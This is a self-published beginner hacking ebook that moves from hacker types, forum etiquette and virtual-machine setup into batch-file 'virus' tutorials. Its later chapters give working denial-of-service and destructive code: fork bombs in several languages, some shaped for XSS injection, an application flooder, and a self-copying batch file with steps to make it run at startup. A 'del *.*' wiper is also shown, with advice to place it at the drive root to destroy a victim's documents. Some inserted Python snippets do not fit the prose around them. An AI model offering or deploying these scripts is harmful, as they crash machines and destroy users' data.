THECATALOGTIMES

HACKING AND ITS BASICS

THIS IS WHAT YOU HAVE BEEN SEARCHING FOR

EMMANUEL AWM
This book's formatting and alignment were made by Emmanuel A.W.M of Thecatalogtimes Design; you can contact us for your publishing projects. All content is from the author Loki Zero, and I am not responsible for any copyright issues.

HACKING AND ITS BASICS

Copyright 2017 by Loki Zero

All rights reserved. No part of this ebook may be used or reproduced in any manner whatsoever without written permission except in the case of brief quotations embodied in critical articles or reviews.

This book is a work of fiction. Names, characters, businesses, organizations, places, events and incidents either are the product of the author's imagination or are used fictitiously. Any resemblance to actual persons, living or dead, events, or locales is entirely coincidental.

For information contact: http://www.thecatalogtimes.wordpress.com

Book and Cover design by Thecatalogtimes Setup

ISBN: 132-778-078

First Edition: November 2017

CONTENTS

HACKING AND ITS BASICS
CHAPTER ONE
CHAPTER TWO
CHAPTER THREE
CHAPTER FOUR
CHAPTER FIVE
CHAPTER SIX
CHAPTER SEVEN
CHAPTER EIGHT
CHAPTER NINE
CHAPTER TEN
ABOUT THE AUTHOR

CHAPTER ONE

What is Hacking?

A person who is able to discover a weakness in a system and manages to exploit it is called a hacker, and this process is known as hacking.

Hacking is an art. It is the mastery of a system that gives you complete control over it. It is the act of modifying the inner workings of a system, in order to make it do something that its original creator never intended.

That's the gist of it. But as with all things, the devil is in the details. This is what this website is for.

I'm going to make a broad claim here: The only thing you need to become a hacker is interest and dedication. But more than anything else, you need a thirst for knowledge. You should always be willing to learn something new, always open to new ideas. So come with me, follow along with this series of tutorials and before long you'll see for yourself that the claim has been justified.

Before moving on, there's a couple of things that we need to address.

First of all, privacy. Your data is everywhere, a part of you sitting on some servers around the world. Privacy is your right to decide who can use that data and how. The internet as we know it came into being decades ago. At the time, it wasn't built with privacy in mind. But things have changed now. Not only do we need to protect ourselves against malicious agents but maybe, just maybe, a day may come when we must protect ourselves from those who are meant to be protecting us, our governments. Because of this, hacking no longer means just exploiting or patching up security holes in a system, it is now also a means of protecting a basic human right, the right to privacy.

Secondly, these days the only side of hacking that people hear about is the bad one. Credit card theft, identity theft, ransomware, stolen accounts and data and so on. The mere word hacking brings with it an inherently negative vibe. It doesn't have to be this way. We hear about millions of accounts being leaked, attacks on major websites, attacks on individuals, but we never really hear about all the attacks that never occurred. There is a whole other side to hacking that never quite gets to see the light of day.

For every major hack that makes the news, many more are prevented by security specialists. These people, these whitehat hackers, possess exactly the same skillset as the blackhats, but they choose to use it for good. No software can ever be completely secure and that makes cyber security a cat and mouse game. A race between whitehats and blackhats. A battle of angels and demons, the stakes of which have never been higher than they are today. The global cost of cyber crime is projected to reach $2 trillion by 2019.

CHAPTER TWO

Types of Hacker

So we know what hacking is, now let's talk about hackers. There are a lot of things that distinguish different kinds of hackers. Most importantly, skill and motivations. That is, what are you trying to accomplish and how far are you willing to go? This is the question I want you, the reader, to ask yourself at the end of this article.

Script Kiddie

Script kiddies, in a word, are noobs. People who want to hack for shortsighted selfish reasons without having any inclination to actually learn something. These are the people who'd rather spend their time looking for some secret tricks that they think real hackers use. They may figure out how to use tools and scripts made by others but they can neither make their own tools nor do anything that involves a task more complex than copy-pasting. A script kiddie is that one annoying kid in class who pisses off everyone else. Don't be that guy.

Black hat

Black hat hackers are the bad guys. They are cyber criminals with malicious intent whose only goal is personal gain or sabotage. They are digital thieves: they steal money, credit card information, valuable data and identities. They infect systems with viruses, trojans and malware and create botnets to do their bidding. They cost the hardworking and honest people around the world billions of dollars each year. Some do it out of greed, some do it to show off while some others just want to watch the world burn.

White hat

White hat hackers are the good guys who hack to improve the security of systems. The field of penetration testing involves probing a system, say a website or a company's internal network, to look for vulnerabilities. The white hats (or penetration testers) find these security flaws and help the developers fix them. While the majority of the hacking process is the same for white hats and black hats, there's a world of difference when it comes to their intentions. White hats want to help patch up vulnerabilities whereas black hats want to exploit them.

Software security is one of the fastest growing fields today. More and more companies are hiring security specialists as well as offering bug bounty programs. Whether you simply want a hobby or wish to go further, the world of cyber security has you covered.

Grey hat hackers

These are the hackers who may work offensively or defensively depending on the situation. Hackers who don't have malicious intentions but still like to break into third-party systems just for the thrill and fun or maybe just to announce a newfound vulnerability in a wild and supposedly heroic way.

Case in point

Remember, breaking into a company's internal network without authorization or taking a peek at a private database just for fun is just as bad as malicious hacking in the eyes of the law.

Hacktivists

These are the hackers who use their skills as a means of protesting against injustice and protecting human rights such as free speech. They attack a system or website to popularize a notion or gather attention to a specific case for rectification. They are vigilantes, the dark knights of the hacking universe. This is where good intentions collide with the law, for hacktivists may or may not carry out illegal activities to get their point across to the world. They are outlaws who deliver their own brand of rough justice. Anonymous, LulzSec and WikiLeaks are a few notable hacktivist groups.

Government

The potential consequences of government hacking are so enormous and far reaching that I feel compelled to put them in a different category. Imagine an adversary that not only has access to billions of dollars but also decides the laws in your country. An adversary who wants control over every aspect of your life. How do you defend against such an opponent?

This is increasingly becoming a global problem. Instead of protecting the human right to privacy, governments around the world are opting to violate it, following in the footsteps of the NSA and GCHQ. In the coming tutorials, protecting your privacy is going to be an ever-present concern for us.

You

What about you? Which side are you on? Decided anything yet? Don't worry, you'll have plenty of time to figure it out. Every single one of the above types of hackers makes use of the same hacking techniques. They all start out the same way, they all learn the same things but they end up in vastly different places. No matter what you pick, remember that hacking is a practical field and you will be on the front lines.

Now let us begin our journey by learning how to create viruses. But before we can do that, let's get you all set up with a virtual machine so that you don't accidentally wreck your computer. Safety first, right?

CHAPTER THREE

More On Hacking

Who is a Hacker?

In computer networking, hacking is any technical effort to manipulate the normal behavior of network connections and connected systems. A hacker is any person engaged in hacking. The term hacking historically referred to constructive, clever technical work that was not necessarily related to computer systems.

Today, however, hacking and hackers are most commonly associated with malicious programming attacks on the Internet and other networks.

Origins of Hacking:

M.I.T. engineers in the 1950s and 1960s first popularized the term and concept of hacking. Starting at the model train club and later in the mainframe computer rooms, the so-called hacks perpetrated by these hackers were intended to be harmless technical experiments and fun learning activities. Later, outside of M.I.T., others began applying the term to less honorable pursuits. Before the Internet became popular, for example, several hackers in the U.S. experimented with methods to modify telephones for making free long-distance calls over the phone network illegally.

As computer networking and the Internet exploded in popularity, data networks became by far the most common target of hackers and hacking.

Hacking vs. Cracking

Malicious attacks on computer networks are officially known as cracking, while hacking truly applies only to activities having good intentions. Most non-technical people fail to make this distinction, however. Outside of academia, it's extremely common to see the term hack misused and applied to cracks as well.

Common Network Hacking Techniques

Hacking on computer networks is often done through scripts or other network programming. These programs generally manipulate data passing through a network connection in ways designed to obtain more information about how the target system works. Many such pre-packaged scripts are posted on the Internet for anyone, typically entry-level hackers, to use.

More advanced hackers may study and modify these scripts to develop new methods. A few highly skilled hackers work for commercial firms with the job of protecting that company's software and data from outside hacking. Cracking techniques on networks include creating worms, initiating denial of service (DoS) attacks, or establishing unauthorized remote access connections to a device.

CHAPTER FOUR

Not Being A Noob

Now that we have a basic grasp on ethical hacking, we need to address something before we proceed further. The following article assumes that you are a complete beginner and will likely help you every step of the way in becoming a hacker. This article is for anyone who wishes to communicate their troubles efficiently and get their questions answered without uncalled-for rudeness. If you are a programmer or have other considerable technical experience, feel free to skip this one.

The purpose of this course is to teach you hacking, but hacking is really something that can only be self-taught. If you are indeed serious about hacking, you will first have to learn how to learn.

Where to ask for help with hacking?

When learning something new, you are going to run into problems. Everyone does, it's all a part of the journey. You'll find that there are plenty of online communities where you can go and ask questions and just find help with something. A couple of those are:

Information Security Stack Exchange

Reddit: /r/Hacking, /r/HowToHack, /r/netsec

And of course, there's me on Twitter, always happy to help with any queries you may have.

How to ask for help?

Just Google it!

Please read the rules and code of conduct before posting

If you can't do it, doesn't mean it doesn't work.

These are just some of the replies I frequently come across on various blogs, forums and comment threads around the internet. As a beginner, you need to understand that when you're asking someone for help, you're asking a stranger to take time out of their day and devote it to you, another stranger. It is your responsibility to prove that you are worth helping.

So many online communities are full of friendly people willing to help beginners get up to speed. And yet, noobs are still everywhere:

Fake.. Doesn't work.

I tried but wasn't able to do this thing.. how do I do this thing?

How to hack FB easily?

Need hacking tool for this online game..

You can see why these sorts of half-assed attempts at trying to get someone else to do your work are often ignored and even ridiculed. And in hacking, what these noobs are usually trying to do is most likely selfish, unethical and even illegal. You are not going to find help like this.

On the internet, you come across all sorts of people from all walks of life. Most people, at one point or another, encounter someone who, instead of answering or just ignoring a sincere question or request, chooses to be rude and mocks the person asking the question.

Why does this happen? Why do we still see so many pointless conversations? Why do so many questions that have been asked and answered a million times still seem to stagger some? How to get out of this vicious cycle? How to avoid coming across as a noob and how to help others who are in fact not so different from us? It's time someone answered these questions. So, here's my attempt.

Admittedly, this may seem a bit general but not being a noob (or at least not looking like one) holds great importance, especially for beginner hackers. This is because the only way to get help is from someone who has experience in this field. It isn't hard to understand the lack of patience when it comes to dealing with people who are just looking for shortcuts instead of trying to learn and contribute something.

When you ask for help online, it's important to do so in a way that's mindful of the reader's time. Not only does this make it more likely that you'll receive a helpful reply but it also helps other people with the same query who may find your page in the future. This is how you ask a question:

Google before asking. Why waste your own and others' time when a question has already been answered elsewhere? Google your question before posting it in a forum or community.

Use proper grammar. If people can't understand you, they can't answer your questions. If your English isn't very good, then you really should learn English first as the majority of content on the internet (including hacking tutorials) is in English.

Clearly state the problem. Mention what you are trying to do and why you cannot seem to do so.

What all have you tried? Tell the readers which solutions you found on Google and that none of them solved your problem, which is why you're asking for help.

Tell us your specs. Don't leave out any important information that a reader may need to answer your question. Mention all the relevant details such as your operating system, version of software etc.

So long as you do this, you will receive polite and helpful answers to all your questions and you will be making the internet a better place for everyone.

A couple of points deserve to be explained further. These are some common red flags that signal that the person asking a question has only selfish interest in mind, not learning.

Asking Google-able Questions

Yes, this again. There's an awful lot of people on our little planet. Say you want to go out to congratulate everyone who has a birthday today and take 10 seconds per person. Assuming a conservative average of 20 million birthdays a day, it will take you over 6 years, if you went 24 hours a day, every day. By that time, of course, the last person would have aged 6 years and would not be very happy with you. What's the point of telling you this? Not only that statistics are fun but more importantly: There's an awful lot of people in the world.

With this in mind, there's a very good chance that when you face a problem, somewhere someone else has already faced and overcome the same problem in the past. The answers are right there on the internet, waiting to be googled.

Further, Google has a ridiculously large webpage index (over 30 trillion freaking pages). Say you type something in the Google search bar, notice that it comes up with numerous suggestions, millions of pages most of the time. That means someone has probably typed that before. It's like almost everything we'll ever think has already been thought of by someone else. Consequently, the majority of what we'll ever search on Google has already been searched by someone else and there's a good chance that your problem has already been solved.

So before doing anything else, you should always Google for a solution to whatever problem you are facing. Not only is this much quicker for you, but it saves others' time as well. Life is short. Learn to Google.

Asking unethical questions

This is a big issue in hacking. If your only goal is to hack your ex-girlfriend's Facebook account or steal your neighbor's WiFi (all the while without having the slightest inclination towards educating yourself), while strangers on the internet cannot stop you from trying to do such things, they are almost certainly not going to help you.

I started this website ~4 years ago, in that time I have received literally tens of thousands of requests to hack someone's Facebook account. I haven't replied to a single such request and I don't plan on ever doing so. To an expert hacker, when someone asks a question, their intentions are immediately clear. Noobs are not fooling anyone.

Your morality is up to you but do not expect others to help realize your petty ambitions.

Expecting too much

Hacking is not magic. When a problem presents itself, a hacker should break it down into logical steps and find a solution. Movies have engraved in the minds of naive viewers that expert hackers are practically magicians. According to movies, an expert hacker might as well be typing any nonsense on his/her keyboard (while blindfolded) and the greatest glories and accomplishments can be achieved. Entire nations can be supposedly hacked, gazillions of dollars await hackers just a few keystrokes away and what not. According to movies, tomorrow we may even see evil hackers burning our morning toasts and remotely hacking into our mobile phones and programming them to grow wings and fly off. No. Please stop.

To the astonishment of noobs, there is no top-secret program that can suddenly turn them into an expert. When performing any hacking technique, there is a set of steps one must carry out methodically to attempt to hack something. Further, the majority of the tools used are actually free, in fact most are open-source. Remember Google-able questions? This is one of them.

When a person asks a question about which they have little to no knowledge, it is obviously going to drive away potential respondents. What the person needs to understand is that the respondent is doing them a favor. Nobody is going to sit down and happily write a custom spoon-fed tutorial, so that the person can then mindlessly follow it and obtain something they clearly do not deserve. Everyone's time is valuable and if the person is asking a total stranger for an unreasonably big chunk, they are going to be ignored.

The world will always be moving fast and it is up to us to keep up. Humanity's collective intelligence will always surpass any individual's intelligence. It is for this reason that hackers, more than any other group, should learn to learn from and teach others, peacefully. Exchange of information and ideas are the pillars keeping the hacker community alive, bonded and continually rising to greater heights.

So that's that and now we're finally ready to begin learning hacking. Let's start by creating our very own viruses.

CHAPTER FIVE

Setting Up a Virtual Machine to Practice Hacking

Now that we've got the introduction to hacking out of the way, there's just one last thing left before we can actually start hacking.

Due to the *ahem* sensitive nature of our field of work, I recommend you use a virtual machine and not your personal native OS for doing anything you're not familiar with. Virtual machines are perfect for practicing hacking:

You can do whatever you want inside a VM and just hit reset and you're back to a working OS.

You can blow it up however you want, see what happens when you delete important stuff and do unspeakable things to it with zero risk of damaging your actual system.

It's cross-platform. Are you on Windows? Mac? Linux? Doesn't matter. You can run all of these inside each other.

It's free. Officially free, that is, no need to pirate or download from shady sources. (At least for Windows and Linux)

In the following few tutorials, we'll need to use Windows. So here we're going to see how to set up a Windows Virtual Machine. Eventually we'll move on to using Kali Linux for more advanced hacking.

Now, let's get to it.

Step 1

For creating a virtual machine we need two things: the virtualization software and the OS image file.

The Virtualization Software: I recommend https://www.virtualbox.org/ . It's free and cross-platform.

The OS Image: You can find a bunch of Windows OS images at https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ .

The above link will take you here

Microsoft is currently offering Windows 7 through 10, pick whichever you want. I picked Windows 10 Stable.

Make sure to select the right platform. For us that's VirtualBox.

Click the download button (it's about 4 GB).

If you encounter any issues, you can view installation instructions.

These OS images that Microsoft is offering are meant for testing and not normal usage. They are valid for 90 days, after which we'll have to reset the virtual machine to keep using it. To do this, we'll take a snapshot of the initial state. Using a snapshot is also an easy way to reset the virtual machine back to a working state should something bad happen, which it will because we're here to practice hacking.

After the download is complete, you should have a zip file that contains MSEdge - Win10_preview.ova. This is our image file. Now we need to load it up into VirtualBox.

Step 2

Extract the .ova file somewhere and start VirtualBox. Click File -> Import Appliance.

Step 3

Now find your .ova file and click Next.

Step 4

Click Import.

Step 5

And now your virtual machine is set up, you should see something like this:

Step 6

Just a couple more things and then we can fire it up. Go to Settings, then the Display tab and increase the video memory to 128 MB. This will allow you to use the virtual machine in full screen and make it a bit more responsive.

Step 7

Click Snapshot in the upper right corner and then the camera button to create a snapshot. (Ideally, you should do this before starting the virtual machine for the first time)

Step 8

Step 9

And that's it. Hit Start and our virtual machine is ready to handle all the abuse we're about to throw at it. When something goes wrong, simply restore the snapshot and it'll work again.

Now you're ready to test a variety of hacking techniques while keeping your own system safe. The virtual machine effectively acts as a sandbox, protecting you from yourself. In a future tutorial, we'll expand upon this by setting up networking with virtual machines, which allows you to do even more such as practicing hacking webcams or penetration testing firewalls or setting up man-in-the-middle attacks and so on.

We have a long and very interesting road ahead of us. But for now, we're going to start off with something small and powerful. Say hello to batch file viruses.

CHAPTER SIX

Introduction to Batch File Viruses

In the following few tutorials, we'll be learning about batch file viruses. We'll look at various techniques to bring down a computer using small and simple scripts. Even if you have no background in programming, you'll find it very easy to follow along.

I recommend you use a virtual machine running a Windows OS if you want to follow along yourself. This is as much for safety as it is for convenience. This tutorial is pretty safe but from the next one we'll start building viruses. The first virus we'll look at will overload the computer's memory. That is, the computer will run out of RAM and likely freeze up and shut down. While this is unlikely to cause any lasting damage, using a virtual machine will still be more convenient simply because you won't have to keep restarting your computer because it crashed. Soon after this we will get to viruses that can do some very real and permanent damage to your system. You don't want to hack yourself, right? So you might as well learn how to set up a virtual machine for hacking practice before continuing.

Now let us begin.

What are batch files?

A batch file is the name given to a type of script file, a text file containing a series of commands to be executed by the command interpreter. Batch files have the extension .bat (or .cmd). They can be easily created using any text editor such as Notepad.

Now let's see some of these commands.


echo Hello World

The echo command is used to print out a message, in this case Hello World. Type up the above in a text editor and save it as something.bat. Now open it and a command window pops up. But you'll notice that it closes before we get a chance to see what it outputs. Let's fix that.

echo Hello World
pause

The pause command pauses the execution of the batch file until a user presses a key. You should now see the following output:

C:\Users\Loki\Desktop>echo Hello World
Hello World

C:\Users\Loki\Desktop>pause
Press any key to continue . . .

C:\Users\Loki\Desktop> is where the execution is happening. In my case, I've saved the batch file on the desktop. The batch file seems to be printing the commands before executing them. It first prints echo Hello World then actually executes it to output Hello World. Let's see if we can clean this up a bit.

@echo off
echo Hello World
pause

And this outputs

Hello World
Press any key to continue . . .

Much better. @echo off is used to stop the commands from being printed and leaves only the output of those commands. Now let's add a little dynamic behavior.

@echo off
set a=Loki
echo Hello %a%
pause

The set command is used to define variables that can hold different values, in this case the string Loki. The variable name enclosed within %% is how we access the value stored in the variable. Run the above and you should see

Hello Loki
Press any key to continue . . .

Be careful here, the set command is pretty sensitive about the use of spaces:

set a=Loki means a has the value Loki

set a= Loki (with a space after the =) means a has the value Loki (with a space before it) and

set a =Loki (with a space before =) means that the variable is not defined as a but as a followed by a space.

Some commands come with modifiers that slightly alter their behavior:

@echo off
set /a a=5
set /a b=10
set /a c=%a% + %b%
echo %c%
pause

In set /a, the /a part is telling set that it should treat the value of the variable as a number, allowing us to perform mathematical operations on it.

@echo off
set /p a=Enter your name:
echo Hello %a%
pause

The /p modifier tells the set command that it should take in some input from the user and store that in the variable a. When you run the batch file, you will be prompted to enter something. The output looks like:

Enter your name: Emily
Hello Emily
Press any key to continue . . .

Examples of Batch Files

That was pretty easy, now let's take a look at a couple more batch files that might actually be useful and then we'll go and make some viruses.

Pinger

@echo off
title Pinger
set /p target=Enter IP address or URL:
ping %target% -t
pause

This outputs:

Enter IP address or URL: google.com

Pinging google.com [216.58.220.206] with 32 bytes of data:
Reply from 216.58.220.206: bytes=32 time=26ms TTL=57
Reply from 216.58.220.206: bytes=32 time=25ms TTL=57
Reply from 216.58.220.206: bytes=32 time=27ms TTL=57
Reply from 216.58.220.206: bytes=32 time=25ms TTL=57
Reply from 216.58.220.206: bytes=32 time=26ms TTL=57

Pretty handy if you want to quickly ping an IP address/URL or check your internet connection.

P.S: Pressing CTRL+C forcefully stops any running command (like ping -t which likes to run forever).

Shutdown timer

The batch file schedules a shutdown after X minutes.

@echo off
title Shutdown Input
set /p mins=Enter number of minutes to wait until shutdown:
set /a mins=%mins%*60
shutdown -s -t %mins%

This was but a glimpse of what batch files can do. Almost anything your operating system does for you can be done through batch files. You can even use them to automate repetitive and boring tasks. The limit is only your imagination.

One of these imaginative uses is creating batch file viruses and that is just what we're going to learn now. Let's start with the famous fork bomb.

CHAPTER SEVEN

Fork Bomb

The fork bomb is the equivalent of a DDoS attack on your own


system. It aims to deprive the system of memory (RAM),
leaving nothing for other applications or the operating
systems vital operations required to keep the systems
running, hence crashing it. Just 5 characters long, the fork
bomb is not permanently harmful for a computer, just
annoying.

Were now going to build on the introduction to batch files.


Make sure youve got a VM all set up and running.

l58
And here is the fork bomb:
%0|%0

Yes, this is it. The above is a shorter alternative for the
following more comprehensible code:
:s

start %0

goto s

Here, the first line creates a label s.

%0 actually refers to the name of the batch file itself.

By start %0 we're running the same file again.

And finally goto s brings us back to the top, forming a loop.

So every time the loop is run another instance of the same
program is started and then both of them run together and
again duplicate themselves and so on.

Every program doubling itself is a form of exponential growth.
After one iteration of the loop, two programs (2^1) are created.
After another cycle, each of those two create another two for a
total of four (2^2). After 10 iterations we have 1024 (2^10)
instances of our little batch file. After 100 iterations we have
2^100 = 1.267 nonillion, a number so big you don't even know
what nonillion is (it's 10^30).


The first instance will likely not even complete 50 iterations
before the system grinds to a halt and crashes. For such a
simple script, each individual iteration would hardly take a few
milliseconds, so the first few iterations complete very quickly
and soon it becomes more than what the computer can handle.

Is there a way to protect against fork bombs? Yup.

Any antivirus worth its salt would be able to scan this
suspicious executable file and warn the user before execution.
As a fork bomb's mode of operation is entirely dependent on
being able to create new processes, one way of preventing a
fork bomb from severely affecting the entire system is to limit
the maximum number of processes that a single user may own.
On Linux, this can be achieved by using the ulimit utility; for
example, the command ulimit -u 30 would limit the affected
user to a maximum of thirty owned processes.
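The per-user process limit above contains a runaway script; spotting one early is the other half of the defence. The following Python check is an added example, not code from the original book: it reads a constructed snapshot in the format of `ps -eo pid,ppid,user,comm` and flags commands whose processes were started by copies of themselves, plus users approaching their process limit. The sample data, function names and thresholds are assumptions.

```python
from collections import Counter

# Constructed sample in the format of `ps -eo pid,ppid,user,comm` (not real output).
SAMPLE_PS = """\
  PID  PPID USER     COMM
    1     0 root     systemd
  812     1 root     sshd
 2001   812 alice    bash
 2040  2001 alice    vim
 3001   812 bob      bash
 3100  3001 bob      run.sh
 3101  3100 bob      run.sh
 3102  3100 bob      run.sh
 3103  3101 bob      run.sh
 3104  3101 bob      run.sh
 3105  3102 bob      run.sh
 3106  3102 bob      run.sh
"""

def parse_ps(text):
    """Return a list of {pid, ppid, user, comm} dicts, skipping the header."""
    procs = []
    for line in text.splitlines()[1:]:
        fields = line.split(None, 3)
        if len(fields) == 4:
            pid, ppid, user, comm = fields
            procs.append({"pid": int(pid), "ppid": int(ppid),
                          "user": user, "comm": comm})
    return procs

def self_spawners(procs, min_clones=5):
    """Flag (user, comm) pairs where many processes have a parent running
    the same command, the signature of a self-replicating script."""
    comm_of = {p["pid"]: p["comm"] for p in procs}
    clones = Counter((p["user"], p["comm"]) for p in procs
                     if comm_of.get(p["ppid"]) == p["comm"])
    return {key: n for key, n in clones.items() if n >= min_clones}

def users_near_limit(procs, nproc_limit, ratio=0.8):
    """Users whose process count is at or above ratio * nproc_limit.
    root is skipped because the nproc limit is not enforced for it."""
    counts = Counter(p["user"] for p in procs)
    return sorted(u for u, n in counts.items()
                  if u != "root" and n >= ratio * nproc_limit)

if __name__ == "__main__":
    procs = parse_ps(SAMPLE_PS)
    print(self_spawners(procs))                  # self-replicating commands
    print(users_near_limit(procs, nproc_limit=10))
```

Run against live data by feeding the real `ps` output to `parse_ps`; the thresholds should be tuned to what is normal on the host.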

And so we have our first little virus under our belt. Head over
to the next one to continue or scroll down if you're interested
in checking out the code for fork bomb in other common
languages.

Bash

:(){ :|:& };:

Python

import os

while 1:

    os.fork()


Java
public class ForkBomb
{
    public static void main(String[] args)
    {
        while(true)
        {
            Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
        }
    }
}

Ruby

loop { fork { load(__FILE__) } }

C
#include <unistd.h>

int main(void)
{
    while(1) {
        fork(); /* malloc can be used in order to increase the data usage */
    }
}


JavaScript
while (true) {

    var w = window.open();

    w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);

}

The following version is easier for injection (XSS):

<a href="#" onload="function() { while (true) { var w = window.open(); w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); } }">XSS fork bomb</a>

And the following is simply a more aggressive version of the
above:
<script>

setInterval(function() {

var w = window.open();

w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);

}, 10);

</script>


CHAPTER EIGHT

Application Flooder

Not unlike the fork bomb we just saw, the application
flooder, although technically harmless, is a really annoying
virus. Here's how it looks:

@echo off

:begin

start mspaint

start notepad

start write

start cmd

start explorer

start control

start calc

goto begin

Like all the other batch file virus tutorials, I recommend
trying this one out in a virtual machine.

Let's go through it line by line:

@echo off: This simply stops the command prompts
from appearing when the batch file is executing.
When you start a batch file, a command prompt
process (cmd.exe) is opened and that batch file's
instructions are piped through. We use @echo
off when we don't want to notify the user about what
the running batch file is doing.

:begin: This is a label. It's like a marker or a
checkpoint, a position in the program that we've
given a name to.

start: This is used to start an executable, similar to
what happens when you double click an application.


You can see that we have a bunch of these commands
and they're all starting something different. These are
just a handful of the default programs that come with
all installations of Windows. This is where
we're flooding applications. Specifically we're
starting up the applications: Paint, Notepad,
WordPad, a command window, file explorer, control
panel and a calculator. You can start up any
executable (.exe) by using start <PATH-TO-EXECUTABLE>.

goto: Remember the label we just defined above
(:begin)? Using the goto command, we go to the label
begin, and the program continues execution from
there. This is an infinite loop. So all the above
applications are started again and again until there
are hundreds of open windows or until the operating
system crashes or a good antivirus intervenes.

So there you have it. This is one of the simplest and
oldest viruses out there. But the story isn't over yet. The
viruses that actually infect and harm the systems in this day
and age are vastly more complicated. However, you are now
one step closer to a better understanding of the big picture.
Head over to the next virus to continue.


CHAPTER NINE

Overloading Memory

This virus combines the best of the fork bomb and the application
flooder.

It creates a new batch file in the same directory and then copies itself
onto this new file. It then starts this new virus and then both of them
create another copy of themselves which are then run and the
process repeats over and over and we have an exponential growth in
the number of viruses on disk and in memory (RAM).

So let's have a look:

@echo off

:A

set x=%random%

type %0 >> %x%.bat

start %x%.bat

goto:A

Depending on what runs out first, hard disk space or RAM, the batch
file may or may not cause permanent damage. In both cases,
however, the computer will almost definitely crash, the operating
system may be corrupted and on the next start up, you will be
greeted by the well-known Blue Screen Of Death. The only way to
get rid of it will be to format your hard drive and re-install the
operating system.

(Optional) To make this file execute automatically at startup, do the
following. Create a shortcut of the damage.bat file by right clicking
on it. Open the start menu, in Programs open the Startup folder and
simply drag or cut-paste the shortcut into this folder. The virus will
break loose the next time the computer is started up.

These past couple of batch file viruses were, at best, annoying. Now
let's do some real damage. Next up, we're going to be wiping out
memory.


CHAPTER TEN

Wiping Out Memory

Now that we've learned how to overload the computer's
memory, in this tutorial we're going to wipe it all off. This is a short
and easy one. This is different from the other batch file viruses we've
seen so far. This can do real damage. Make sure you only run this inside
a VM.

del *.*

A quick refresher: the del command is used to delete files or folders
with the following syntax:

del [options] [/A:file_attributes] files_to_delete

For example: the command del fileName.extension will delete the file
fileName.extension in the current directory. * is a wildcard, it means
all. So *.* means all file names with any extensions. Putting a *
before the .(dot) means that no matter what the file's name is, it will
be deleted. Putting a * after the . means that no matter what the file's
type is, it will be deleted. Combined, del *.* means that all files and
folders encountered by our script in the current directory will be
wiped off completely.

Clearly, this could be quite dangerous to a system as nothing will be
left, even the operating system's vital files may be deleted, when this
guy is done. But of course, it can only affect files in the directory
where the batch file itself is placed. So, placing it at the root level
(say C:\deleteEverything.bat) is the way to go.

How do we protect against it? For one, we have the principle of least
privilege (PoLP). In most modern operating systems, the problem of
accidental deletion of mission critical files is solved by the use of
user access levels. In Windows, if you try to delete something
important, you are sure to be greeted by:

You need to provide administrator privileges to delete some folder

If you try to delete something really really important, the operating
system will simply deny doing so. Similarly, if you try to mess with
someone else's files (in a multi-user environment), you may not be
able to read, edit, execute (or all three) depending on what
permissions they (the other user) and the admin have granted you
and by extension any scripts or programs you try to run.

Linux, on the other hand, is even more obsessive when it comes to
privileges. File permissions form a core part of nearly all Unix-like
systems. So, we hackers have our work cut out for us. Unfortunately
our cute little virus will likely not completely corrupt today's
systems. However, it can still wipe out any confidential documents
that your victim holds dear so it is still dangerous. If you wish to try
it out, fire up a virtual machine and let it rip.
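How Unix file permissions bound what a mass delete can remove, shown as an added Python audit that is not part of the original book: it decides from mode bits alone which files a given account could unlink, including the sticky-bit rule used on shared directories. The function names are assumptions, and ACLs, immutable flags and read-only mounts are not modelled.

```python
import os
import stat

def can_delete(path, uid, gids=()):
    """Decide from mode bits alone whether `uid` may unlink `path`.

    Deletion is governed by the parent directory: the user needs write
    and search (w and x) permission on it, and if the directory is
    sticky, must also own the file or the directory.
    """
    if uid == 0:                      # root bypasses ordinary mode checks
        return True
    parent = os.path.dirname(os.path.abspath(path))
    d = os.stat(parent)
    if uid == d.st_uid:
        bits = (d.st_mode >> 6) & 7   # owner rwx
    elif d.st_gid in gids:
        bits = (d.st_mode >> 3) & 7   # group rwx
    else:
        bits = d.st_mode & 7          # other rwx
    if bits & 3 != 3:                 # need both w (2) and x (1)
        return False
    if d.st_mode & stat.S_ISVTX:      # sticky bit, as on /tmp
        return uid in (os.lstat(path).st_uid, d.st_uid)
    return True

def deletable_files(root, uid, gids=()):
    """List files under `root` that a mass delete run as `uid` could remove."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        hits += [os.path.join(dirpath, f) for f in files
                 if can_delete(os.path.join(dirpath, f), uid, gids)]
    return sorted(hits)

if __name__ == "__main__":
    # Audit the current directory for the account running the script.
    for p in deletable_files(".", os.getuid(), [os.getgid(), *os.getgroups()]):
        print(p)
```

Running it for an unprivileged service account over a document share shows how much a runaway or malicious script under that account could destroy, which is the exposure least privilege is meant to shrink.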

Now let's try a different kind of virus in the next ebook drop; I
promise you will love it. Up next, we've got the mighty folder blaster.

ABOUT THE AUTHOR

The author, Loki Zero, is a young, vibrant, anonymous
hacker who has imparted knowledge to a series of young
hackers; no other part of his personal information can be
disclosed.
The co-author, Emmanuel AWM, is a teenage writer,
programmer, web developer, blogger and a tech guy with a flair
for everything. He has written a series of short novels, tutorial
eBooks and lots more.

www.thecatalogtimes.wordpress.com


Thanks for reading! Please add a short review on
Amazon, EBS7
and let me know what you thought!

It's nice to have a final call to action like this in the back to
drive reviews. I would also add an opt-in offer, like "download
the next book in the series for free!".

If this ebook was useful for you, why not share it with
your writer friends? You could even write a blog post about
this book, and link to www.ebs7.gq.

Thanks and good luck!

Emmanuel AWM